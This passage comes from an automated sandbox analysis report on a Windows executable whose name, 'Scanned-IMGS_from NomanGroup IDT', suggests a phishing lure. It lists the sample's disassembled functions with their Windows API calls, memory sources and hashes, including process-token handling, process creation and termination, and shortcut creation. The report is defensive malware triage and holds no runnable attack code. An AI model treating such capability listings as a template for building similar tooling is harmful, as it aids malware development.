                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$FileName$OpenSave
                                                                                • String ID: X
                                                                                • API String ID: 83654149-3081909835
                                                                                • Opcode ID: bf382f8138f2241a813744b1795c1b3afe1c9867c8c690f5062cef8d4730070e
                                                                                • Instruction ID: 146d38e1470ffce4d23e0d4f68a89fa25b61a9aa0f7ce1dda677759399986edf
                                                                                • Opcode Fuzzy Hash: bf382f8138f2241a813744b1795c1b3afe1c9867c8c690f5062cef8d4730070e
                                                                                • Instruction Fuzzy Hash: 8BE1A235508340AFC754DF25C485F6AB7E4BF85318F04896EE8899B3A2DB38DD05CB9A
                                                                                Function 0046920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                • BeginPaint.USER32(?,?,?), ref: 00469241
                                                                                • GetWindowRect.USER32(?,?), ref: 004692A5
                                                                                • ScreenToClient.USER32(?,?), ref: 004692C2
                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004692D3
                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 00469321
                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004A71EA
                                                                                  • Part of subcall function 00469339: BeginPath.GDI32(00000000), ref: 00469357
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                • String ID:
                                                                                • API String ID: 3050599898-0
                                                                                • Opcode ID: d782e2256e50f04570cfa898643b4311f12b110711a53e65a3527a0f10134d2a
                                                                                • Instruction ID: d9c5c0b5a9eec057a2b06e2d4b3d2f3a3d63b132c3acb47f432b403ad010e70d
                                                                                • Opcode Fuzzy Hash: d782e2256e50f04570cfa898643b4311f12b110711a53e65a3527a0f10134d2a
                                                                                • Instruction Fuzzy Hash: F841AF70104340AFD720DF25CCD4FAB7BA8EF6A324F04066AF954862A2D7749C46DB6A
                                                                                Function 004C07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 004C080C
                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 004C0847
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 004C0863
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 004C08DC
                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004C08F3
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 004C0921
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3368777196-0
                                                                                • Opcode ID: 983455003e30685f233cbcddb26d4796b9f44dc458799bf72d5ad8d6abb8eb16
                                                                                • Instruction ID: 77d259b16aa309cea1122ccad5e799c40fe6d475c12d5cd9d84189210ba1369a
                                                                                • Opcode Fuzzy Hash: 983455003e30685f233cbcddb26d4796b9f44dc458799bf72d5ad8d6abb8eb16
                                                                                • Instruction Fuzzy Hash: 68417971900205EBDF14AF55DC85AAABB78FF04304F1080AAED009E297DB35DE65DBA8
                                                                                Function 004E81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,004AF3AB,00000000,?,?,00000000,?,004A682C,00000004,00000000,00000000), ref: 004E824C
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004E8272
                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 004E82D1
                                                                                • ShowWindow.USER32(00000000,00000004), ref: 004E82E5
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 004E830B
                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004E832F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 642888154-0
                                                                                • Opcode ID: 81bd29b60db1a23124f62180f1a1aacee44767a34897f8fce9eef15d3972f626
                                                                                • Instruction ID: 096cd033775c9dd68cfa6def7160381438dd85d8521189acc42be66943904489
                                                                                • Opcode Fuzzy Hash: 81bd29b60db1a23124f62180f1a1aacee44767a34897f8fce9eef15d3972f626
                                                                                • Instruction Fuzzy Hash: B1419530601684AFDF25CF16C8D5BA67BE0BF16715F1842AEEA0C5F263C7365846CB58
                                                                                Function 004B4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 004B4C95
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004B4CB2
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004B4CEA
                                                                                • _wcslen.LIBCMT ref: 004B4D08
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004B4D10
                                                                                • _wcsstr.LIBVCRUNTIME ref: 004B4D1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                • String ID:
                                                                                • API String ID: 72514467-0
                                                                                • Opcode ID: a5cfe697923386029937a345337af4da9bbbb32cf3d73783461cbfb38885520a
                                                                                • Instruction ID: 64a9a3d3cbeecfe59a9450fd3146b1a66104911eb4e08337836340722680171e
                                                                                • Opcode Fuzzy Hash: a5cfe697923386029937a345337af4da9bbbb32cf3d73783461cbfb38885520a
                                                                                • Instruction Fuzzy Hash: EC21C8726041407BEB155B39EC45ABB7FACDF85754F10803FF805CA293EA69DC0196B5
                                                                                Function 004C581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00453AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00453A97,?,?,00452E7F,?,?,?,00000000), ref: 00453AC2
                                                                                • _wcslen.LIBCMT ref: 004C587B
                                                                                • CoInitialize.OLE32(00000000), ref: 004C5995
                                                                                • CoCreateInstance.OLE32(004EFCF8,00000000,00000001,004EFB68,?), ref: 004C59AE
                                                                                • CoUninitialize.OLE32 ref: 004C59CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                • String ID: .lnk
                                                                                • API String ID: 3172280962-24824748
                                                                                • Opcode ID: a6a27ee4b70e00131e71313f51c4fc942128644e5291513f09e52dcfe4bace71
                                                                                • Instruction ID: 868f4eb8516b47e9e21cdd2733ce6e092014fda19a46480986ed425de4facdb4
                                                                                • Opcode Fuzzy Hash: a6a27ee4b70e00131e71313f51c4fc942128644e5291513f09e52dcfe4bace71
                                                                                • Instruction Fuzzy Hash: 6ED154796046019FC704DF15C480E2EBBE1EF89319F14495EF8899B362DB39EC85CB96
                                                                                Function 004B175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004B0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004B0FCA
                                                                                  • Part of subcall function 004B0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004B0FD6
                                                                                  • Part of subcall function 004B0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004B0FE5
                                                                                  • Part of subcall function 004B0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004B0FEC
                                                                                  • Part of subcall function 004B0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004B1002
                                                                                • GetLengthSid.ADVAPI32(?,00000000,004B1335), ref: 004B17AE
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004B17BA
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004B17C1
                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 004B17DA
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,004B1335), ref: 004B17EE
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B17F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                • String ID:
                                                                                • API String ID: 3008561057-0
                                                                                • Opcode ID: db60fcfe99ecdefafef1dddc40ebad5bb1c6bc491f96d05461cd4c497a818088
                                                                                • Instruction ID: df5175da0ee120756aa19e040ece8c04dfe63c094472f9b436d909c99371a761
                                                                                • Opcode Fuzzy Hash: db60fcfe99ecdefafef1dddc40ebad5bb1c6bc491f96d05461cd4c497a818088
                                                                                • Instruction Fuzzy Hash: EA11AF32500205FFDB109FA4CC99BEFBBA9EF42355F50442AF4419B221CB399941CB68
                                                                                Function 004B14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004B14FF
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004B1506
                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004B1515
                                                                                • CloseHandle.KERNEL32(00000004), ref: 004B1520
                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004B154F
                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 004B1563
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                • String ID:
                                                                                • API String ID: 1413079979-0
                                                                                • Opcode ID: 38a3659681915fffd1dbcec7f9576f025312ae3188af9ce659187c6eea261cf9
                                                                                • Instruction ID: 48a4b5c54220c7e989073a18a6b9a7867d6d1d9698669b5fda9f88c221f3b237
                                                                                • Opcode Fuzzy Hash: 38a3659681915fffd1dbcec7f9576f025312ae3188af9ce659187c6eea261cf9
                                                                                • Instruction Fuzzy Hash: ED11867210024AEBDF11CFA8DE89BDE3BA9EF48704F044026FE05A6160C3758E61DB64
                                                                                Function 00473382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00473379,00472FE5), ref: 00473390
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0047339E
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004733B7
                                                                                • SetLastError.KERNEL32(00000000,?,00473379,00472FE5), ref: 00473409
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: ff16f01c8f95396232360bd21cc66b5e73cb08edb892f9206f3938fd67516851
                                                                                • Instruction ID: db0f3b5651bbe8d04bd1abea82e3e37667f0bbab7a9a18a1e5d4fac6a3a42ee1
                                                                                • Opcode Fuzzy Hash: ff16f01c8f95396232360bd21cc66b5e73cb08edb892f9206f3938fd67516851
                                                                                • Instruction Fuzzy Hash: 1201F532248311AEA6352F756CC95EB2E55DB1977B320C22FF818842F1EF1A5D06714C
                                                                                Function 00482D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00485686,00493CD6,?,00000000,?,00485B6A,?,?,?,?,?,0047E6D1,?,00518A48), ref: 00482D78
                                                                                • _free.LIBCMT ref: 00482DAB
                                                                                • _free.LIBCMT ref: 00482DD3
                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0047E6D1,?,00518A48,00000010,00454F4A,?,?,00000000,00493CD6), ref: 00482DE0
                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0047E6D1,?,00518A48,00000010,00454F4A,?,?,00000000,00493CD6), ref: 00482DEC
                                                                                • _abort.LIBCMT ref: 00482DF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: 774dd23fc16f8d0111d9d4cc2d04f52e2d57e9aee6db53340f253fa3e33dfeeb
                                                                                • Instruction ID: 52ac0d5e958260aac3dfb9ee8538e877c9859c93429aa0bb2d6699131bf99b44
                                                                                • Opcode Fuzzy Hash: 774dd23fc16f8d0111d9d4cc2d04f52e2d57e9aee6db53340f253fa3e33dfeeb
                                                                                • Instruction Fuzzy Hash: 78F02D7668550037C21237397E46E5F1D996FC2765F214C1FFC24962D2EFAC9802536D
                                                                                Function 004E8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00469639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00469693
                                                                                  • Part of subcall function 00469639: SelectObject.GDI32(?,00000000), ref: 004696A2
                                                                                  • Part of subcall function 00469639: BeginPath.GDI32(?), ref: 004696B9
                                                                                  • Part of subcall function 00469639: SelectObject.GDI32(?,00000000), ref: 004696E2
                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 004E8A4E
                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 004E8A62
                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 004E8A70
                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 004E8A80
                                                                                • EndPath.GDI32(?), ref: 004E8A90
                                                                                • StrokePath.GDI32(?), ref: 004E8AA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                • Opcode ID: 582d9e907fc10cf70b8646b1ca9138bac697fcba50469de805380e7ee40c0300
                                                                                • Instruction ID: f9f35fb3ad3d5f3b2ab96a3126711e0950422068464e0ba9980398f565392aad
                                                                                • Opcode Fuzzy Hash: 582d9e907fc10cf70b8646b1ca9138bac697fcba50469de805380e7ee40c0300
                                                                                • Instruction Fuzzy Hash: C211F77600018CFFDF129F91DC88EAA7F6CEB08354F008066FA199A1A1C771AD56DBA4
                                                                                Function 004B51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 004B5218
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004B5229
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004B5230
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004B5238
                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004B524F
                                                                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 004B5261
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDevice$Release
                                                                                • String ID:
                                                                                • API String ID: 1035833867-0
                                                                                • Opcode ID: 4aa2170a06a737fade5b8d774eef323f7fc09b87b7b3a0707f89be2bbebe619e
                                                                                • Instruction ID: 7290082707a7812d903dcb7f91972aa8e2e59eee1e3ca41beea25bbd7d07a09f
                                                                                • Opcode Fuzzy Hash: 4aa2170a06a737fade5b8d774eef323f7fc09b87b7b3a0707f89be2bbebe619e
                                                                                • Instruction Fuzzy Hash: 40014F75A01758BBEB109BF69C89B5FBFB8EB48751F044066FA04AB281D6709801CFA4
                                                                                Function 00451BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00451BF4
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00451BFC
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00451C07
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00451C12
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00451C1A
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00451C22
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: 64c0aad4e68872be469e67d010e2d855ce836ef3a67e0e5a36f264d09b142773
                                                                                • Instruction ID: bf17133333990eee6cb0e31be9d78ce8ee44074bd3921cb4c18ee1e3eb36fdb4
                                                                                • Opcode Fuzzy Hash: 64c0aad4e68872be469e67d010e2d855ce836ef3a67e0e5a36f264d09b142773
                                                                                • Instruction Fuzzy Hash: B60144B0902B5ABDE3008F6A8C85A52FFA8FF19354F00411BA15C4BA42C7B5A864CBE5
                                                                                Function 004BEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004BEB30
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004BEB46
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 004BEB55
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004BEB64
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004BEB6E
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004BEB75
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: dc5cdc088a92ba683a75fc83163239c4880033eafb86689e553f440ba918c52c
                                                                                • Instruction ID: 2b9b32f8369b4f63a042c406cc65a817a90dc9ecd6c714f1430b89b9a795a048
                                                                                • Opcode Fuzzy Hash: dc5cdc088a92ba683a75fc83163239c4880033eafb86689e553f440ba918c52c
                                                                                • Instruction Fuzzy Hash: C0F05472140198BFE72157629C8DEEF7E7CEFCAB11F000169FA01D5192D7A05A02CAB9
